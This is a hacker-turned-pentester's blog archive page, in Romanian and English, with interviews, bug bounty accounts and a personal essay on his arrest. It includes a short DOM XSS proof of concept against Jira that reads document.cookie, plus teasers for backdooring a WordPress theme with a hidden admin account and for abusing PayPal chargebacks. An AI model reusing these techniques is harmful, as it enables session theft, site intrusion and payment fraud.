Razvan Cernaianu: TinKode

Showing posts with label TinKode. Show all posts

My interview for NBC News - On Assignment: Growing Threat "Ransomware"

You can see the full report Sunday, May 8 on 'On Assignment.'

Cyber Smart Defence at ICE Totally Gaming 2016

ICE Totally Gaming: www.icetotallygaming.com

Madalin Dumitru, CEO at Cyber Smart Defence, a leading provider of cyber security, will present at the 2016 ICE conference some key points of CSD's strategy in order to provide with its customers the peace of mind they require from cyber threats. Services offered include human hacking – black box penetration testing, cyber intelligence and incident handling.

"Our experience has taught us that automated testing tools cannot replace the capabilities of an attacker’s mind. What differentiates Cyber Smart Defence from our competitors is that we focus on performing manual testing, with minimum usage of automated tools. Thus, we simulate real attacks by trying to break into a customer’s system in the same way that an attacker might try, and this is why our security reports are very accurate in reflecting a system’s real level of security."

TeslaMotors Bug Bounty - DOM XSS - PoC

# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Website: www.CyberSmartDefence.com
# Blog: www.TinKode.com

---[ Vulnerable Code ]---

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">
  <h1>${name}</h1>
</div>

---[ Proof of Concept ]---

<html>
<script>
 var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
</script>
</html>

Top10Archive: Top 10 Notorious Hackers Around The World

Quote: "Welcome to Top10Archive! In today’s day and age the internet can become a battleground for cyber wars. Hackers have been known to take down crucial websites, steal credit card information, take down gaming servers, and even use their expertise to assist government agencies. In the cyber world, some of these hackers have gained quite a bit of fame for their computer expertise, becoming some of the most notorious hackers in internet history."

Watch the video

10. Lizard Squad
9. Johnathan James
8. Syrian Electronic Army
7. Gary McKinnon
6. Jeanson Ancheta
5. Kevin Mitnick
4. Kristina Svechinskaya
3. ASTRA
2. TinKode
1. Anonymous

Source: http://www.top10archive.net/

Auditing United Airlines - Bug Bounty Program

Acum câteva luni de zile cei de la United Airlines au deschis un program de Bug Bounty puțin mai diferit decât cele deja existente. Adică, în loc să te premieze cu o anumită sumă de bani, te premiază în mile pe care le poți folosi pentru a zbura (or for car rentals, hotel stays, merchandise and more) cu linia lor sau una care face parte din cadrul Star Alliance. Recompensele sunt cuprinse între 50,000 / 250,000 până la 1,000,000 de mile. Ca să fiu mai explicit, sunt doar niște puncte de "loialitate". De exemplu, un zbor București - Dublin valorează cam 30,000 miles.

Sună promițător, nu? :)

După câteva zile de la deschiderea programului, am început să caut și eu vulnerabilități în *.united.com (cred că așa era la început - după care au modificat lăsând valide doar câteva subdomenii - dar au specificat in TOS că pot schimba regulile când vor ei, deci nu putem comenta).

După 2 luni de așteptări și 29 de vulnerabilități descoperite și trimise, am primit primul răspuns:
o recompensă de 50,000 mile în cadrul programului MilesAge. În așteptare mai sunt încă alte 3 vulnerabilități (au fost validate, dar nu le-au reparat). Bănuiesc că și acelea vor fi încadrate tot cu 50,000 fiecare, rezultând un total de 200,000 de miles. Având în vedere că testarea a durat doar două zile, pot spune că sunt mulțumit.

CyberSmartDefence on Digi24 News

Pentru a putea urmări video-ul dați click pe imaginea de mai jos:

In Search of The Most Dangerous Town On the Internet

IN SEARCH OF THE MOST DANGEROUS TOWN ON THE INTERNET is a documentary film that dives deep into the secret world of hacking. It is a bold and artful look at the places and people that are fighting for and against the advancement of cybercrime.

Watch the video

Watch the cybercrime documentary profiling the Romanian town nicknamed "Hackerville" or "Most Dangerous Town on the Internet."

Auditing WesternUnion China - Bug Bounty Program

Acum vreo 3 săptămâni am început serios să caut vulnerabilități în WesternUnion după ce am văzut că s-au înscris într-un program de bug bounty. Pentru necunoscători, semnificația unui program de bug bounty este aceea de: găsește o vulnerabilitate în sistemele noastre și noi te răsplătim cu o sumă de bani în funcție de impactul ei. Până acum sună frumos, dar există o mulțime de dezavantaje în comparație cu avantajele oferite.

Avantajul ar fi că în loc de o echipă de pentesteri limitată din punct de vedere numeric poți avea auditate serverele de sute de mii de oameni care lucrează în domeniu sau care sunt freelanceri. Unul din marele dezavantaje ar fi că dai acordul tuturor potențialilor atacatori rau intenționați să umble nestingheriți prin lucrurile tale, ei putând foarte ușor să vândă (neputând fi acuzați de acces neautorizat) ceea ce găsesc pe piața neagră. Dar să nu ne abatem prea mult de la subiect.

Din lista de domenii valide pentru acest program am ales să caut vulnerabilități în WesternUnion China (www.WesternUnion.cn). După o scurtă perioadă de timp am găsit câteva vulnerabilități ce s-au dovedit a fi duplicate (raportate de alții). Dar asta nu m-a descurajat să caut în continuare.

După câteva ore de auditare, am găsit următoarele:

Restricted files bypass
MySQL Injection
Arbitrary File Download
Cross-Site Scripting
Information Exposure
Multiple Session Vulnerabilities

Voi detalia în ordine cronologică vulnerabilitățiile identificate.

My interview for M6 France

Acum câteva luni de zile am dat un interviu pentru M6 France. Tema emisiunii (Zone Interdite) a fost despre hackeri. Aici puteți urmări întreaga emisiune (eu apar la sfarșit - 01:17:00) : M6 France - Zone Interdite. Un rezumat îl puteți găsi AICI.

Vizionare plăcută.

Safely double your money with PayPal

ENGLISH VERSION : https://cybersmartdefence.com/docs/Paypal-Safely-Double-your-Money.csd

În următoarele rânduri voi explica o metodă cu ajutorul căreia vă puteți dubla banii din contul de paypal... la nesfârșit. Probabil toți o să credeți că am găsit o vulnerabilitate web. Din păcate este vorba despre ceva mult mai grav. Ca sa fiu mai exact este o problemă cu TOS-ul lor.

Prin anul 2010 am făcut o tranzacție pe paypal cu o persoană ce a încercat să mă înșele folosind funcția chargeback. Cum eu nu îmi țineam niciodată banii pe acel cont de paypal, i-am transferat pe contul meu real. După o lună de zile când am intrat din nou pe acel cont am observat că am balanță negativă și anume -50$. Asta m-a pus pe gânduri puțin. De ce? Pentru că m-a făcut să mă gândesc la o situație care avea mai tarziu să reprezinte metoda perfectă de a îți dubla banii prin intermediul serviciului Paypal.

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi dea seama proprietarul.

Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală.

Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator. Codul este următorul:

Cum să ne ascundem fişierele pe un telefon sau tabletă ce rulează android

Ştiu că sunteţi foarte mulţi care aveţi secrete faţă de alţii, sau pur şi simplu vreţi să aveţi intimitatea voastră când vine vorba despre telefonul mobil (sms-uri, imagini, videoclipuri, fişiere audio, etc). Poate că unii dintre voi ştiţi deja despre ce vreau să arăt.

Pe Google Play există o aplicaţie numită "Hide it Pro". O puteţi descărca de aici. Ce m-a fascinat la această aplicaţie a fost ideea în sine. După ce o veţi înstala o să aveţi în meniul vostru cel de toate zilele o nouă pictogramă numită "Audio Manager", care functionează precum un configurator de sunete. Dar dacă şi numai dacă veţi ţine o anumită perioadă de timp apăsat (depinde de voi cât timp veţi seta) unde scrie "Audio Manager" ca în poza aceasta, o să apară să introduceţi un PIN (ca aici) pentru a accesa meniul din "Hide it Pro".

Acum puteţi să vă jucaţi cât vreţi cu aplicaţia care arată cam aşa.

0day Websites Exploit - Cyber Smart Defence

Video URL : https://vimeo.com/68618897

Info
Tested website: 0day.CyberSmartDefence.com
Tested CMS: WordPress (it works for any CMS platform).

Intoduction
Hello everyone. In this video I'll show you a 0day exploit based on a critical vulnerability, more exactly "Source Code Disclosure".

What can be done with this exploit?
With this 0day exploit we can disclose the source code of any file from a website (written in: PHP / ASP / CFM / JSP / etc).

How can this be possible?
After a long research, Cyber Smart Defence found a way to exploit the SSL service to obtain this result.

In order to find the best way to be secure contact us at www.CyberSmartDefence.com

My Interview with Reuters

RPT-From hackers to security experts, the Balkan IT sector is booming

Oracle, SAP, Hewlett Packard are in Romania and Bulgaria
Romania has become centre for computer hacking
Technology sector is a rare success in depressed economies

After hacking the Pentagon, NASA and Britain's Royal Navy for fun, TinKode got a real job as a computer security expert for a Romanian cyber safety consultancy. TinKode was the name used by Romanian Razvan Cernaianu when he revealed security holes in government and corporate systems across the world, earning him a two-year suspended prison sentence. "I was really passionate about carrying out what I call security audits," Cernaianu told Reuters "It's a hobby, so I did it for free. Moreover, I've always sent emails to those institutions to fix their problems."

My first TV apparition

Prima mea aparitie TV. Video-ul de mai sus este un promo al emisiunii "Romania, Te Iubesc", in care este prezentat de aceasta data un reportaj despre hackerii romani, si care va aparea duminica la data de 17.03.2013 pe ProTV, ora 18:00. Vizionare placuta.

The 13: Lucky or Unlucky

13 Ianuarie, o zi ca restul zilelor pentru majoritatea dintre noi, chiar dacă pentru alții care sunt superstițioși reprezintă o zi ghinionistă. De fel nu dau prea mare importanță evenimentelor care au o mare tangență cu anumite cifre sau alte lucruri. Dar totuși nu pot uita această zi care îmi trezește o mulțime de amintiri deoarece astăzi se împlinește fix un an de zile de când am trecut print-o întâmplare care nu îmi aduce deloc zâmbetul pe buze.

Îmi amintesc de parcă s-ar fi petrecut ieri. 13 (vinerea) Ianuarie 2012. A fost o zi tare ghinionistă pentru mine dar cu toate acestea pot spune că am avut un noroc de neînchipuit. Pe scurt eu l-am numit un ajutor primit din partea unei entități divine. Sincer să fiu până atunci nu prea am fost persoana care credea cu tărie în Dumnezeu. Poate că acesta a fost un semn să mă schimb.

CodeName: Cyber Smart Defence - CSD

De când mă știu am avut o mulțime de senzații asemănătoare cu un fel de deja-vu unde visam cu ochii deschiși să zic așa. Simțeam până în adâncul sufletului că reprezint ceva. Că prezența mea pe acest pământ nu a fost o pură întâmplare. Știu, pentru majoritatea va suna de parcă aș fi cel mai lăudăros om de pe fața pământului, dar câțiva poate mă vor înțelege și vor privi din alt unghi situația. Cred că ăsta a fost unul din motivele care m-a îndemnat atât de mult să îmi urmez visele, să am voință să ajung „sus”.

Acum să revenim la titlu, „CodeName: Cyber Smart Defence - CSD”. Scriu acest articol în scopul de a face un anunț important unde vreau să evidențiez noul meu loc de muncă. După o perioadă îndelungată am făcut în sfârșit o alegere. Am pus în balanță salariul, libertatea modului de a lucra, timpul liber și să nu am un șef care să mă bată la cap zi de zi că nu e mulțumit de mine și că vrea mai mult. :)

Libertatea.ro

Nici nu știu cum să încep. După ce am fost arestat, presa din România a început să scrie articole despre mine pe bandă rulantă, despre ce am realizat eu și mai ales despre ce fel de persoană sunt în viața reală. Totul ok până aici. Am fost foarte revoltat când am citit un articol într-un ziar care prin absurd îmi luase și un interviu cu ceva timp în urmă. De ce spun asta? Păi au mințit cu nerușinare spunând o mulțime de lucruri lipsite de respect. Articolul poate fi citit aici: www.libertatea.ro/...

Câteva citate:

"A fost corigent în liceu, a luat Bac-ul în sesiunea din toamnă, a intrat cu greu la facultate, a fost crescut de mama sa şi nu a mai avut o iubită de doi ani. Acesta este profilul românului de 20 de ani, botezat TinKode, care i-a învins pe americani de unul singur.
...
Pentru că a fost repetent în liceu, băiatul a dat Bac-ul abia în toamna anului trecut, apoi s-a înscris la Facultatea de Matematică-Informatică din Timişoara. Culmea, Răzvan nu a fost admis printre primii, ci a avut media 7,17 şi beneficiază de o bursă socială, iar în prima sa sesiune are deja o notă de 4 la examenul de matematică.
...
Mai mult, deşi abilităţile sale au pus în încurcătură companii ultracunoscute din lume, TinKode are la informatică doar nota 8. Băiatul nu a ieşit cu nimic în evidenţă printre colegii săi, iar ultima iubită a avut-o în urmă cu doi ani, acasă, la Drobeta-Turnu Severin. Băiatul a fost crescut de mama sa, după ce tatăl lui a murit, iar potrivit vecinilor familiei Cernăianu, se pare că femeia, pensionată pe caz de boală, ar fi ştiut cu ce se ocupa Răzvan. "

TinKode - "The Slacker"

Salutare! Numele meu este Cernăianu Manole Răzvan și sunt cunoscut pe internet sub pseudonimul TinKode (sincer să fiu nu am crezut vreodată că va veni ziua în care mă voi prezenta în lumea virtuală cu numele meu adevărat). Mulți s-au întrebat de unde m-am inspirat în alegerea acestui nickname și ce vrea să reprezinte. Hmmm, să o luăm de la început. Până a ajunge la acest ‘TinKode’ am folosit o mulțime de alte nick-uri, până când într-o zi am început să scriu pe google combinații de cuvinte care mi se păreau atractive de unde a rezultat un nickname ușor de memorat.

De mic am fost pasionat de calculatoare, primul avându-l în clasa a I-a sau a II-a, dar asta nu înseamnă că aș fi știut prea multe despre acestea până nu am avut acces la internet. Din momentul în care am fost conectat la WWW am început să citesc o mulțime de lucruri interesante, m-am documentat despre cele mai bine plătite meserii pe internet (am considerat că nu este pentru mine un job care necesită ~~doar~~ forță fizică pe o durată nelimitată de timp) până când am găsit câteva detalii despre pentesting (penetration testing).

Pentesting-ul m-a atras din toate punctele de vedere: este o meserie foarte bine plătită și flexibilă care implică totodată cunoștințe vaste în domeniul securității web. Dar sunt de părere că dacă vrei să excelezi aici trebuie să gândești precum un infractor cibernetic pe scurt un black-hat hacker. De ce spun asta? Păi dacă vrei să găsești toate punctele slabe ale unui sistem trebuie să ai experiență, să poți fi în mintea hacker-ului iar experiența se dobândește prin practica în real world (cum ar fi numită de majoritatea) pentru că întâmpini tot felul de probleme care mai de care mai diferite sau metode care nu se predau niciunde.

Nu spun că dacă ești de la bun început un white-hat și ai învățat tot ce este necesar într-o facultate sau la cursuri speciale de genul, nu vei face o muncă bună, dar un black-hat care devine white-hat va avea întotdeauna un atuu în plus. Sper să nu se înțeleagă că încurajez black hacking-ul; este un risc pe care trebuie să ți-l asumi de la bun început și de cele mai multe ori nu se merită pentru că vei ajunge dator cu câteva sute de mii de $ și cu un dosar aproape cât tine de mare (cum a fost cazul meu și am cam 1.75 metri înălțime) și de ce să excludem și varianta în care poți ajunge după gratii o perioadă îndelungată de timp sau dacă ai noroc primești o sentință cu suspendare.

Libertatea. Este un subiect pe care mulți ignoră să îl ia în calcul atunci când se apucă de activități ilegale în lumea virtuală sau cea reală. Majoritatea se împacă cu ideea că dacă sunt prinşi vreodată nu vor avea probleme financiare când sunt eliberaţi. Din cauza teribilismului se ajunge în primul exemplu și din prostie în al doilea. Oricât de bun hacker ai fi întotdeauna vei avea nașul tău și dacă acest naș nu este de aceeași categorie cu tine, adică tot un hacker, mai mult ca sigur va fi un informator a.k.a. ‘sifon‘ și procentajul în care o să ai tot ce ai obținut confiscat este foarte ridicat.

Să vă riscați libertatea nu se merită pentru nimic în lume. Și o spun din propria experiență… Am petrecut aproximativ 90 de zile (de pe 31 ianuarie - 27 aprilie 2012; o nimica toată în comparație cu restul pedepselor) în arest preventiv unde ești 24/24 de ore privat de libertate. Îți petreci cea mai mare parte din timp cu alte 3 până la 7 persoane într-o încăpere de 4 metri pătrați unde totul este gri și dacă ai noroc și vremea este de partea ta poți să ieși în curtea de recreere. Te poți deprima imediat dacă nu ai un caracter puternic sau nu crezi în tine. Am fost în celulă cu tot felul de infractori precum criminali, falsificatori de bani, carderi, hoți, etc (nu e un motiv de teamă, toți suntem oameni și dacă există respect și vorbe calculate totul este ok) dar să știi că ești la cheremul unor gardieni este cel mai neplăcut lucru.

Eu am fost privit diferit față de restul, din cauza motivului arestării mele. Totul a fost bine dar totuși foarte greu. Din această lecție am învățat că nu trebuie să îți riști libertatea pentru nimic în lume și că orice sumă de bani ar putea fi la mijloc, nu îi va ține locul absolut niciodată. Acesta este un capitol din trecutul meu în care mi-a fost arătat gustul amar al vieții dar acum trebuie să fiu fericit deoarece totul a revenit la normal. Nu trebuie să uităm că omul din greșeli învață.

Ce am realizat? A meritat!? Întrebările acestea mi-au fost adresate cel mai frecvent din partea multor persoane în ultimul timp fiind curioase dacă a meritat tot ce am făcut și ce am realizat. Răspunsul e cu 2 tăișuri și de ce spun asta? Păi în primul rând ‘sincer să fiu‘ nu a meritat mai deloc deoarece din cauza mea au suferit multe persoane (din suflet le cer scuze) și mă refer la rude, iubită și unii prieteni care s-au dovedit a fi foarte puțini, restul însemnând cunoștințe care sunt pe lângă tine la bine iar la greu se fac pierdute în lume. În al 2-lea rând a meritat pentru că mi-am împlinit un vis și anume să fiu cunoscut și recunoscut doar pentru ceea ce am facut eu și nu furând munca sau laudele altuia. Am reușit acest lucru doarece am avut o doză de ambiție imensă care m-a ajutat poate cel mai mult și am avut încredere în mine. Unul dintre visuri a fost bifat cu ‘check’ dar mai rămân alte câteva sute pe lista mea care sunt momentan doar în stadiul incipient dar nu îmi fac griji, am doar 21 de ani deci există timp din belșug.

Consider că am reusit puțin acolo să schimb percepția oamenilor asupra termenului ‘hacker’ (cu toate că nu mă consider unul) să nu mai fie confundați cu alte tipuri cărora nu le dau numele. M-am simțit mandru că sunt român când mi-am auzit naționalitatea în mass-media din toată lumea, nu știu dacă și voi ați simțit la fel. Mulți o să mă contrazică spunând că sunt un infractor și nu e ceva de lăudat, dar uită sau nu știu că eu am încercat să ajut găsind acele vulnerabilități și nu am dorit să le folosesc în scopuri personale (spre înțelegerea tuturor acele fapte bune costă enorm de mult dacă sunt realizate din partea unor firme din domeniul testării securității web – penetration testing).

Spunând acestea mulți m-au considerat, mă consideră si mă vor considera egocentric și mă vor critica că am vrut faimă s.a.m.d. Îi înțeleg și sunt conștient de asta. Oricât de simpatic sau bun ai fi nu poți să îi convingi pe toți să te placă. Sunt de părere că atunci când nu ești plăcut de un număr de persoane semnificativ mare este bine deoarece înseamnă că îți faci treaba cum trebuie și aceștia se simt plafonați sau sunt invidioși din cauza succesului tău. Și până la urmă ce rost ar mai avea admiratorii dacă nu ai și opusul lor pe cei ranchiunoși. Toate criticile primite le-am transformat în combustibil pentru a-mi alimenta țelul de a mă autodepăși, iar dacă le dai prea multă importanță o să te devieze de la scopul tău și o să îți pierzi încrederea în tine.

În încheiere vă pot sfătui să aveți încredere în voi și în ceea ce faceți. Fiți într-o continuă competiție cu voi înșivă. Și nu în ultimul rând să aveți voința să deveniți din ce în ce mai buni în domeniul vostru preferat, nu ai nimic de pierdut dacă încerci.